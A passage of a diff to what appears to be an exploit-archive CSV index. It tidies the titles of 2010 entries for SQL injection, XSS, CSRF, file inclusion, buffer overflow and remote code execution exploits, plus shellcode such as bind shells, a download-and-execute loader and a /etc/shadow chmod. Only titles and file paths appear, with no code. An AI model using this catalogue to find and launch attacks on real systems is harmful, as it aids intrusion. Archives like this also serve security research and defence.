Haunted House Directory Listing SQL Injection",2010-06-09,Sid3^effects,php,webapps,0 -13785,platforms/php/webapps/13785.txt,"eLMS Pro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 +13785,platforms/php/webapps/13785.txt,"eLms Pro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 13786,platforms/php/webapps/13786.txt,"PGAUTOPro SQLi and XSS Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 -13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - 0day Exploit PoC (from the wild)",2010-06-09,Unknown,multiple,remote,0 +13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Exploit PoC (from the wild) (0day)",2010-06-09,Unknown,multiple,remote,0 13788,platforms/asp/webapps/13788.txt,"Web Wiz Forums 9.68 SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13789,platforms/asp/webapps/13789.txt,"Virtual Real Estate Manager 3.5 - SQLi Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 13790,platforms/asp/webapps/13790.txt,"iClone SQL Injection Vulnerability",2010-06-09,Sid3^effects,asp,webapps,0 -13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL injection Vulnerability",2010-06-09,Sudden_death,php,webapps,0 +13792,platforms/php/webapps/13792.txt,"Joomla component cinema SQL Injection Vulnerability",2010-06-09,Sudden_death,php,webapps,0 13793,platforms/asp/webapps/13793.txt,"Online Notebook Manager SQLi Vulnerability",2010-06-09,"L0rd CrusAd3r",asp,webapps,0 13794,platforms/multiple/webapps/13794.txt,"Joomla 1.5 Jreservation Component SQLi And XSS Vulnerability",2010-06-09,Sid3^effects,multiple,webapps,0 13796,platforms/php/webapps/13796.txt,"joomla com_jstore SQLi Vulnerability",2010-06-09,Sid3^effects,php,webapps,0 @@ -12117,7 +12117,7 @@ id,file,description,date,author,platform,type,port 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13807,platforms/php/webapps/13807.py,"BtiTracker 1.3.x - 1.4.x - Exploit",2010-06-09,TinKode,php,webapps,0 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles Malformed Escape Sequences Incorrectly",2010-06-10,"Tavis Ormandy",windows,remote,0 -13810,platforms/php/webapps/13810.php,"AWCM CMS Local File Inclusion Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0 +13810,platforms/php/webapps/13810.php,"AWCM CMS - Local File Inclusion Vulnerability",2010-06-10,SwEET-DeViL,php,webapps,0 13812,platforms/php/webapps/13812.txt,"SchoolMation 2.3 - SQLi and XSS Vulnerability",2010-06-10,Sid3^effects,php,webapps,0 13813,platforms/php/webapps/13813.html,"Store Locator Remote Add Admin Exploit CSRF Vulnerability",2010-06-10,JaMbA,php,webapps,0 13814,platforms/asp/webapps/13814.txt,"Pars Design CMS Arbitrary File Upload",2010-06-10,Securitylab.ir,asp,webapps,0 @@ -12228,7 +12228,7 @@ id,file,description,date,author,platform,type,port 13935,platforms/php/webapps/13935.txt,"Joomla Component RSComments 1.0.0 Persistent XSS",2010-06-19,jdc,php,webapps,0 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection Vulnerability (ladder[id])",2010-06-19,ahwak2000,php,webapps,0 13937,platforms/php/webapps/13937.txt,"SnowCade 3.0 - SQL Injection Vulnerability",2010-06-19,ahwak2000,php,webapps,0 -13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 CSRF Proof of Concept",2010-06-19,"Luis Santana",php,webapps,0 +13938,platforms/php/webapps/13938.html,"WebsiteBaker 2.8.1 - CSRF Proof of Concept",2010-06-19,"Luis Santana",php,webapps,0 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - (.ov) Local Universal Stack Overflow Exploit (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 13942,platforms/windows/local/13942.pl,"MoreAmp (.maf) local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 @@ -12246,10 +12246,10 @@ id,file,description,date,author,platform,type,port 13956,platforms/php/webapps/13956.txt,"Joomla Hot Property com_jomestate RFI Vulnerability",2010-06-21,Sid3^effects,php,webapps,0 13957,platforms/php/webapps/13957.txt,"myUPB <= 2.2.6 - Multiple Vulnerabilities",2010-06-21,"ALTBTA ",php,webapps,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server (SFTP module) Multiple Commands DoS Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 -13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 +13959,platforms/windows/dos/13959.c,"teamspeak <= 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 13960,platforms/php/webapps/13960.html,"PHPWCMS 1.4.5 r398 Cross Site Request Forgery Vulnerability",2010-06-21,"Jeremiah Talamantes",php,webapps,0 13961,platforms/php/webapps/13961.txt,"Alpin CMS 1.0 - SQL Injection Vulnerability",2010-06-21,"Th3 RDX",php,webapps,0 -13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 Multiple XSS",2010-06-21,jdc,php,webapps,0 +13962,platforms/php/webapps/13962.txt,"Joomla Component JomSocial 1.6.288 - Multiple XSS",2010-06-21,jdc,php,webapps,0 13964,platforms/php/webapps/13964.txt,"Linker IMG <= 1.0 - Remote File Inclusion Vulnerability",2010-06-21,"Sn!pEr.S!Te Hacker",php,webapps,0 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH PoC",2010-06-22,blake,windows,dos,0 13966,platforms/php/webapps/13966.txt,"The Uploader 2.0.4 - Remote File Disclosure Vulnerability",2010-06-22,Xa7m3d,php,webapps,0 @@ -12264,7 +12264,7 @@ id,file,description,date,author,platform,type,port 13978,platforms/php/webapps/13978.txt,"Job Search Engine Script SQL Injection Vulnerability",2010-06-22,"L0rd CrusAd3r",php,webapps,0 13979,platforms/php/webapps/13979.txt,"Joomla Component com_ybggal 1.0 (catid) SQL Injection Vulnerability",2010-06-22,v3n0m,php,webapps,0 13980,platforms/php/webapps/13980.txt,"Cornerstone CMS SQL Injection Vulnerability",2010-06-22,"Th3 RDX",php,webapps,0 -13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI vulnerability",2010-06-22,kaMtiEz,php,webapps,0 +13981,platforms/php/webapps/13981.txt,"Joomla Component Picasa2Gallery LFI Vulnerability",2010-06-22,kaMtiEz,php,webapps,0 13982,platforms/php/webapps/13982.txt,"Alpin CMS SQL Injection Vulnerability (e4700.asp?id)",2010-06-22,CoBRa_21,php,webapps,0 13983,platforms/php/webapps/13983.txt,"Greeting card 1.1 - SQL Injection Vulnerability",2010-06-22,Net.Edit0r,php,webapps,0 13986,platforms/php/webapps/13986.txt,"Softbiz Resource Repository Script Blind SQL Injection Vulnerability",2010-06-22,Sangteamtham,php,webapps,0 @@ -12285,30 +12285,30 @@ id,file,description,date,author,platform,type,port 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14004,platforms/multiple/webapps/14004.txt,"InterScan Web Security 5.0 - Arbitrary File Upload & Local Privilege Escalation",2010-06-23,"Ivan Huertas",multiple,webapps,0 14005,platforms/php/webapps/14005.txt,"2daybiz MLM Script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 -14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14007,platforms/php/webapps/14007.txt,"Custom Business Card script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14008,platforms/php/webapps/14008.txt,"2daybiz matrimonial script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 +14009,platforms/php/webapps/14009.txt,"2daybiz Freelance script SQL Injection Vulnerability",2010-06-23,JaMbA,php,webapps,0 14010,platforms/novell/dos/14010.txt,"Novell iManager Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14011,platforms/php/webapps/14011.txt,"OpenEMR Electronic Medical Record Software 3.2 - Multiple Vulnerabilities",2010-06-24,"David Shaw",php,webapps,0 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server Denial of Service Vulnerability",2010-06-24,Crash,multiple,dos,80 14013,platforms/windows/remote/14013.txt,"UFO: Alien Invasion 2.2.1 - Remote Arbitrary Code Execution Vulnerability",2010-06-24,"Jason Geffner",windows,remote,0 14014,platforms/win32/shellcode/14014.pl,"ShellCode WinXP SP3 SPA URLDownloadToFileA + CreateProcessA + ExitProcess",2010-06-24,d0lc3,win32,shellcode,0 -14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 +14015,platforms/php/webapps/14015.txt,"2DayBiz photo sharing script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14016,platforms/php/webapps/14016.txt,"AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability",2010-06-24,v3n0m,php,webapps,0 -14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna LFI vulnerability",2010-06-24,MISTERFRIBO,php,webapps,0 +14017,platforms/php/webapps/14017.txt,"Joomla Component com_realtyna LFI Vulnerability",2010-06-24,MISTERFRIBO,php,webapps,0 14018,platforms/php/webapps/14018.txt,"2DayBiz Video Community portal""user-profile.php"" SQL Injection Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 14019,platforms/php/webapps/14019.txt,"2DayBiz Real Estate Portal ""viewpropertydetails.php"" SQL injection",2010-06-24,Sangteamtham,php,webapps,0 -14020,platforms/php/webapps/14020.txt,"2DayBiz - The Web Template Software SQL injection and XSS vulnerability",2010-06-24,Sangteamtham,php,webapps,0 +14020,platforms/php/webapps/14020.txt,"2DayBiz - The Web Template Software SQL Injection and XSS Vulnerability",2010-06-24,Sangteamtham,php,webapps,0 14025,platforms/php/webapps/14025.txt,"2daybiz Job site Script SQL injection",2010-06-24,Sangteamtham,php,webapps,0 -14026,platforms/php/webapps/14026.txt,"AbleDating script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 +14026,platforms/php/webapps/14026.txt,"AbleDating script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14027,platforms/php/webapps/14027.txt,"ActiveCollab 2.3.0 - Local File Inclusion / Directory Traversal",2010-06-24,"Jose Carlos de Arriba",php,webapps,0 -14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 +14028,platforms/php/webapps/14028.txt,"2daybiz B2B Portal Script SQL Injection Vulnerability",2010-06-24,JaMbA,php,webapps,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - ""Request"" Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14030,platforms/asp/webapps/14030.pl,"phportal_1.2 (gunaysoft.php) Remote File Include Vulnerability",2010-06-24,Ma3sTr0-Dz,asp,webapps,0 14032,platforms/windows/dos/14032.pl,"Winstats (.fma) Local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14033,platforms/php/webapps/14033.txt,"Big Forum 5.2v Arbitrary File Upload & LFI Vulnerability",2010-06-24,"Zer0 Thunder",php,webapps,0 14034,platforms/windows/dos/14034.pl,"Wincalc 2 (.num) local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 -14035,platforms/php/webapps/14035.txt,"Big Forum SQL injection Vulnerability (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 +14035,platforms/php/webapps/14035.txt,"Big Forum SQL Injection Vulnerability (forum.php?id)",2010-06-24,JaMbA,php,webapps,0 14036,platforms/windows/dos/14036.pl,"Geomau 7 (.wg2) local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14037,platforms/windows/dos/14037.pl,"Plotwn 18 (.wp2) local Buffer Overflow PoC",2010-06-24,Madjix,windows,dos,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 @@ -12349,13 +12349,13 @@ id,file,description,date,author,platform,type,port 14086,platforms/php/webapps/14086.txt,"PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability",2010-06-28,Dark.Man,php,webapps,0 14089,platforms/php/webapps/14089.txt,"PageDirector CMS Multiple Vulnerabilities",2010-06-28,Tr0y-x,php,webapps,0 14091,platforms/osx/remote/14091.py,"UFO: Alien Invasion 2.2.1 - Remote Code Execution (OSX)",2010-06-28,dookie,osx,remote,0 -14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 Stack buffer overflow",2010-06-28,"fl0 fl0w",windows,local,0 +14092,platforms/windows/local/14092.c,"Kingsoft Writer 2010 Stack Buffer overflow",2010-06-28,"fl0 fl0w",windows,local,0 14094,platforms/php/webapps/14094.txt,"Netartmedia iBoutique.MALL SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14095,platforms/php/webapps/14095.txt,"I-net Multi User Email Script SQLi Vulnerability",2010-06-28,Sid3^effects,php,webapps,0 14096,platforms/php/webapps/14096.html,"CMSQlite & CMySQLite 1.3 - CSRF Vulnerability",2010-06-28,"ADEO Security",php,webapps,0 14097,platforms/linux/shellcode/14097.c,"Linux/ARM - execve(""/bin/sh"",""/bin/sh"",0) - 30 bytes",2010-06-28,"Jonathan Salwan",linux,shellcode,0 14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local SEH BoF",2010-06-28,chap0,windows,local,0 -14099,platforms/windows/dos/14099.py,"MemDb Multiple Remote Dos",2010-06-28,Markot,windows,dos,80 +14099,platforms/windows/dos/14099.py,"MemDb Multiple Remote DoS",2010-06-28,Markot,windows,dos,80 14101,platforms/multiple/webapps/14101.txt,"Subdreamer Pro 3.0.4 - CMS Upload Vulnerability",2010-06-28,Battousai,multiple,webapps,80 14102,platforms/windows/dos/14102.py,"Winamp 5.571 - (.avi) Denial of Service",2010-06-28,"Praveen Darshanam",windows,dos,0 14103,platforms/multiple/webapps/14103.txt,"Applicure DotDefender Persistent XSS",2010-06-28,EnableSecurity,multiple,webapps,80 @@ -12388,7 +12388,7 @@ id,file,description,date,author,platform,type,port 14142,platforms/linux/shellcode/14142.c,"Linux/ARM - polymorphic chmod(""/etc/shadow"", 0777) - 84 Bytes",2010-06-30,"Florian Gaultier",linux,shellcode,0 14144,platforms/php/webapps/14144.txt,"Specialist Bed and Breakfast Website SQL Injection Vulnerability",2010-06-30,JaMbA,php,webapps,0 14145,platforms/php/webapps/14145.txt,"Golf Club Site SQL Injection Vulnerability",2010-06-30,JaMbA,php,webapps,0 -14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) 0day Remote Command Execution",2010-06-30,emgent,hardware,webapps,80 +14146,platforms/hardware/webapps/14146.txt,"Ubiquity Nanostation5 (Air OS) - Remote Command Execution (0day)",2010-06-30,emgent,hardware,webapps,80 14147,platforms/php/webapps/14147.txt,"NinkoBB CSRF Vulnerability",2010-07-01,"ADEO Security",php,webapps,0 14149,platforms/asp/webapps/14149.txt,"Setiran CMS Blind SQL Injection Vulnerability",2010-07-01,"Th3 RDX",asp,webapps,0 14150,platforms/windows/local/14150.pl,"RM Downloader 3.1.3 - Local SEH Exploit (Win7 ASLR and DEP Bypass)",2010-07-01,Node,windows,local,0 @@ -12405,8 +12405,8 @@ id,file,description,date,author,platform,type,port 14164,platforms/php/webapps/14164.txt,"iScripts CyberMatch 1.0 - Blind SQL Injection Vulnerability",2010-07-02,"Salvatore Fresta",php,webapps,0 14165,platforms/php/webapps/14165.txt,"iScripts EasyBiller Cross Site Scripting Vulnerabilities",2010-07-02,Sangteamtham,php,webapps,0 14166,platforms/php/webapps/14166.txt,"Bit Weaver 2.7 - Local File Inclusion Vulnerability",2010-07-02,"John Leitch",php,webapps,0 -14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 -14169,platforms/asp/webapps/14169.txt,"MooreAdvice (productlist.asp) SQL injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 +14168,platforms/asp/webapps/14168.txt,"VGM Forbin (article.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 +14169,platforms/asp/webapps/14169.txt,"MooreAdvice (productlist.asp) SQL Injection Vulnerable",2010-07-02,"Th3 RDX",asp,webapps,0 14170,platforms/php/webapps/14170.txt,"Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 14171,platforms/php/webapps/14171.txt,"Iphone Pointter Social Network LFI Vulnerablility",2010-07-02,Sid3^effects,php,webapps,0 14172,platforms/php/webapps/14172.txt,"Joomla Seyret Video Component (com_seyret) Blind SQL Injection Exploit",2010-07-02,RoAd_KiLlEr,php,webapps,0 @@ -12426,15 +12426,15 @@ id,file,description,date,author,platform,type,port 14190,platforms/arm/shellcode/14190.c,"Linux/ARM - Polymorphic execve(""/bin/sh"", [""/bin/sh""], NULL); - XOR 88 encoded - 78 bytes",2010-07-03,"Jonathan Salwan",arm,shellcode,0 14191,platforms/windows/local/14191.pl,"ASX to MP3 Converter 3.1.2.1 - Local Buffer Overflow (SEH)",2010-07-03,Madjix,windows,local,0 14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS SQL Injection Vulnerability",2010-07-03,"Arash Saadatfar",asp,webapps,0 -14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 -14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 Remote Exploit",2010-07-03,dmc,windows,remote,0 +14193,platforms/php/webapps/14193.c,"iscripts socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0 +14194,platforms/windows/remote/14194.cpp,"Sun Java Web Server 7.0 u7 - Remote Exploit",2010-07-03,dmc,windows,remote,0 14195,platforms/windows/remote/14195.html,"SasCam WebCam Server 2.6.5 - ActiveX SEH Overwrite",2010-07-03,blake,windows,remote,0 14196,platforms/php/webapps/14196.txt,"Joomla SocialAds Component com_socialads Persistent XSS Vulnerability",2010-07-03,Sid3^effects,php,webapps,0 14197,platforms/php/webapps/14197.txt,"iScripts MultiCart 2.2 - Multiple SQL Injection Vulnerability",2010-07-03,"Salvatore Fresta",php,webapps,0 14198,platforms/php/webapps/14198.txt,"Simple:Press Wordpress Plugin 4.3.0 - SQL Injection Vulnerability",2010-07-04,"ADEO Security",php,webapps,0 -14199,platforms/php/webapps/14199.txt,"phpaaCms 0.3.1 - (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 +14199,platforms/php/webapps/14199.txt,"phpaaCMS 0.3.1 - (show.php?id=) SQL Injection Vulnerability",2010-07-04,Shafiq-Ur-Rehman,php,webapps,0 14200,platforms/windows/remote/14200.html,"Registry OCX 1.5 - ActiveX Buffer Overflow Exploit",2010-07-04,blake,windows,remote,0 -14201,platforms/php/webapps/14201.txt,"phpaaCms (list.php?id) SQL Injection Vulnerability",2010-07-04,CoBRa_21,php,webapps,0 +14201,platforms/php/webapps/14201.txt,"phpaaCMS (list.php?id) SQL Injection Vulnerability",2010-07-04,CoBRa_21,php,webapps,0 14202,platforms/php/webapps/14202.txt,"iLister Listing Software LFI Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14203,platforms/php/webapps/14203.txt,"TCW PHP Album Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 14204,platforms/php/webapps/14204.txt,"Esoftpro Online Guestbook Pro Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0 @@ -12446,7 +12446,7 @@ id,file,description,date,author,platform,type,port 14210,platforms/php/webapps/14210.txt,"Joomla Front-edit Address Book Component (com_addressbook) Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0 14211,platforms/php/webapps/14211.txt,"Joomla NijnaMonials Component (com_ninjamonials) Blind SQL Injection Vulnerability",2010-07-04,Sid3^effects,php,webapps,0 14213,platforms/php/webapps/14213.txt,"Joomla Component Sef (com_sef) - LFI Vulnerability",2010-07-05,_mlk_,php,webapps,0 -14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 +14214,platforms/php/webapps/14214.txt,"bbPress 1.0.2 - CSRF Change Admin Password",2010-07-05,saudi0hacker,php,webapps,0 14215,platforms/windows/local/14215.txt,"SasCam 2.7 ActiveX Head Buffer Overflow",2010-07-05,blake,windows,local,0 14216,platforms/linux/shellcode/14216.c,"97 bytes Linx x86 bind shell port 64533",2010-07-05,Magnefikko,linux,shellcode,0 14217,platforms/php/webapps/14217.txt,"WikiWebHelp 0.28 - SQL Injection Vulnerability",2010-07-05,"ADEO Security",php,webapps,0 @@ -12476,7 +12476,7 @@ id,file,description,date,author,platform,type,port 14243,platforms/php/webapps/14243.txt,"BS Events Directory (articlesdetails.php) SQL Injection Vulnerability Proof of Concept",2010-07-06,"Easy Laster",php,webapps,0 14244,platforms/php/webapps/14244.txt,"Lyrics 3.0 - Engine SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14245,platforms/php/webapps/14245.txt,"Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability & Auth Bypass Vulnerabilty.",2010-07-06,**RoAd_KiLlEr**,php,webapps,0 -14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass vulnerability",2010-07-06,"ALTBTA ",php,webapps,0 +14247,platforms/php/webapps/14247.txt,"Auction_Software Script Admin Login Bypass Vulnerability",2010-07-06,"ALTBTA ",php,webapps,0 14248,platforms/windows/remote/14248.py,"minerCPP 0.4b Remote BOF+Format String Attack Exploit",2010-07-06,l3D,windows,remote,0 14249,platforms/php/webapps/14249.txt,"Joomla com_autartimonial Sqli Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 14250,platforms/php/webapps/14250.txt,"Joomla NeoRecruit (com_neorecruit Itemid) Blind SQL Injection Vulnerability",2010-07-06,Sid3^effects,php,webapps,0 @@ -12494,7 +12494,7 @@ id,file,description,date,author,platform,type,port 14264,platforms/hardware/webapps/14264.html,"Harris Stratex StarMAX 2100 WIMAX Subscriber Station Running Config CSRF Exploit",2010-07-07,kalyanakumar,hardware,webapps,0 14265,platforms/php/webapps/14265.txt,"Joomla PaymentsPlus - Mtree 2.1.5 - Blind SQL Injection Vulnerability",2010-07-07,Sid3^effects,php,webapps,0 14266,platforms/windows/dos/14266.pl,"IrcDelphi Daemon Server Denial of Service",2010-07-08,Crash,windows,dos,6667 -14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 +14267,platforms/windows/remote/14267.txt,"EA Battlefield 2 and Battlefield 2142 - Multiple Arbitrary File Upload Vulnerabilities",2010-07-08,"Luigi Auriemma",windows,remote,0 14268,platforms/multiple/dos/14268.txt,"Qt 4.6.3 ""QSslSocketBackendPrivate::transmit()"" Denial of Service",2010-07-08,"Luigi Auriemma",multiple,dos,0 14269,platforms/windows/remote/14269.html,"FathFTP 1.7 ActiveX Buffer Overflow",2010-07-08,blake,windows,remote,0 14270,platforms/php/webapps/14270.txt,"Zylone IT Multiple Blind SQL Injection Vulnerability",2010-07-08,Callo,php,webapps,0 @@ -12502,7 +12502,7 @@ id,file,description,date,author,platform,type,port 14272,platforms/osx/remote/14272.py,"UFO: Alien Invasion 2.2.1 - IRC Client Remote Code Execution - OSX Snow Leopard (ROP)",2010-07-08,d1dn0t,osx,remote,0 14273,platforms/linux/local/14273.sh,"Ubuntu PAM MOTD File Tampering (Privilege Escalation)",2010-07-08,"Kristian Erik Hermansen",linux,local,0 14274,platforms/php/webapps/14274.txt,"Joomla Music Manager Component LFI Vulnerability",2010-07-08,Sid3^effects,php,webapps,0 -14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 0day for WinXP",2010-07-08,webDEViL,windows,remote,0 +14275,platforms/windows/remote/14275.txt,"Real Player 12.0.0.879 (0day)",2010-07-08,webDEViL,windows,remote,0 14276,platforms/linux/shellcode/14276.c,"Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes",2010-07-08,gunslinger_,linux,shellcode,0 14277,platforms/php/webapps/14277.txt,"Inout Music 1.0 - Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 14278,platforms/php/webapps/14278.txt,"Inout Article Base Ultimate Shell Upload Vulnerabilty",2010-07-08,SONIC,php,webapps,0 @@ -12512,7 +12512,7 @@ id,file,description,date,author,platform,type,port 14282,platforms/windows/dos/14282.txt,"cmd.exe Unicode Buffer Overflow (SEH)",2010-07-08,bitform,windows,dos,0 14283,platforms/asp/webapps/14283.txt,"ClickGallery Server SQL Injection Vulnerability",2010-07-08,SONIC,asp,webapps,0 14284,platforms/asp/webapps/14284.txt,"i-Gallery - Multiple Vulnerability",2010-07-08,SONIC,asp,webapps,0 -14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 CSRF Vulnerability",2010-07-08,"Rosario Valotta",windows,webapps,0 +14285,platforms/windows/webapps/14285.txt,"Outlook Web Access 2007 - CSRF Vulnerability",2010-07-08,"Rosario Valotta",windows,webapps,0 14286,platforms/windows/dos/14286.txt,"Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow",2010-07-08,"Luigi Auriemma",windows,dos,0 14287,platforms/windows/remote/14287.cpp,"Sun Java Web Server 7.0 u7 - Exploit with DEP bypass",2010-07-09,dmc,windows,remote,0 14288,platforms/multiple/shellcode/14288.asm,"Write-to-file Shellcode (Win32)",2010-07-09,"Brett Gervasoni",multiple,shellcode,0 @@ -12531,9 +12531,9 @@ id,file,description,date,author,platform,type,port 14310,platforms/php/webapps/14310.js,"DotDefender <= 3.8-5 No Authentication Remote Code Execution Through XSS",2010-07-09,rAWjAW,php,webapps,80 14312,platforms/php/webapps/14312.txt,"Joomla redSHOP Component 1.0 (com_redshop pid) - SQL Injection Vulnerability",2010-07-10,v3n0m,php,webapps,0 14313,platforms/php/webapps/14313.txt,"Joomla MyHome Component (com_myhome) Blind SQL Injection Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 -14315,platforms/php/webapps/14315.txt,"Joomla MySMS Component (com_mysms) Upload Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 +14315,platforms/php/webapps/14315.txt,"Joomla MySms Component (com_mysms) Upload Vulnerability",2010-07-10,Sid3^effects,php,webapps,0 14316,platforms/php/webapps/14316.pl,"PHP-Nuke <= 8.0 (Web_Links Module) Remote Blind SQL Injection Exploit",2010-07-10,yawn,php,webapps,0 -14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 +14318,platforms/php/webapps/14318.html,"Elite CMS 1.01 - Multiple XSS/CSRF Vulnerabilities",2010-07-10,10n1z3d,php,webapps,0 14319,platforms/php/webapps/14319.pl,"PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit",2010-07-10,yawn,php,webapps,0 14320,platforms/php/webapps/14320.pl,"PHP-Nuke <= 8.1.0.3.5b (Your_Account Module) Remote Blind SQL Injection (Benchmark Mode)",2010-07-10,yawn,php,webapps,0 14321,platforms/windows/remote/14321.html,"Image22 ActiveX 1.1.1 - Buffer Overflow Exploit",2010-07-10,blake,windows,remote,0 @@ -12562,7 +12562,7 @@ id,file,description,date,author,platform,type,port 14350,platforms/php/webapps/14350.txt,"Joomla Component QContacts (com_qcontacts) SQL Injection Vulnerability",2010-07-13,_mlk_,php,webapps,0 14351,platforms/php/webapps/14351.txt,"I-net Enquiry Management Script SQL Injection Vulnerability",2010-07-13,D4rk357,php,webapps,0 14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - SEH Exploit (Multiple OS, DEP and ASLR Bypass)",2010-07-13,Node,windows,local,0 -14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 +14353,platforms/php/webapps/14353.html,"Diferior CMS 8.03 - Multiple CSRF Vulnerabilities",2010-07-13,10n1z3d,php,webapps,0 14354,platforms/php/webapps/14354.txt,"AJ Article Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0 14356,platforms/php/webapps/14356.txt,"CustomCMS Persistent XSS Vulnerability",2010-07-13,Sid3^effects,php,webapps,0 @@ -12570,10 +12570,10 @@ id,file,description,date,author,platform,type,port 14359,platforms/php/webapps/14359.html,"Zenphoto CMS 1.3 - Multiple CSRF Vulnerabilities",2010-07-14,10n1z3d,php,webapps,0 14360,platforms/multiple/remote/14360.txt,"Struts2/XWork < 2.2.0 - Remote Command Execution Vulnerability",2010-07-14,"Meder Kydyraliev",multiple,remote,0 